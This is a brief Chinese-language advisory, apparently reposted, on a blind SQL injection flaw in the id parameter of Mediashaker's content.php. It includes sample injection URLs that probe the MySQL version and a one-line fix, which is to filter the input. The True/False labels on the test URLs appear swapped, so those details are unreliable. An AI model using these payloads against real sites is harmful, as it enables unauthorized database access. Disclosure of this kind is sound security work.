作者:吴柏盈4477 | 来源:互联网 | 2023-10-11 02:14
标题:MediashakerBlindSQLInjectionVulnerabilitiy作者:H4ckCitySecurityTeamwww.2cto.comWwW.H4ckCi
标题: Mediashaker Blind SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team www.2cto.com WwW.H4ckCity.Org
影响所有版本
开发者: http://www.mediashaker.com/
测试平台: GNU/ Linux Ubuntu - Windows Server - win7
############################################################################
示例测试
http://www.2cto.com /content.php?id=1 [Blind SQL]
#
#
# Test Blind SQL Injection in MYSQL Version 5:
#
#
# False
#
# http://wwww.2cto.com/content.php?id=1 and substring(@@version,1,1)=5--
#
# True
#
# http://www.2cto.com/content.php?id=1 and substring(@@version,1,1)=4--
#
# 修复
过滤content.php页面id参数输入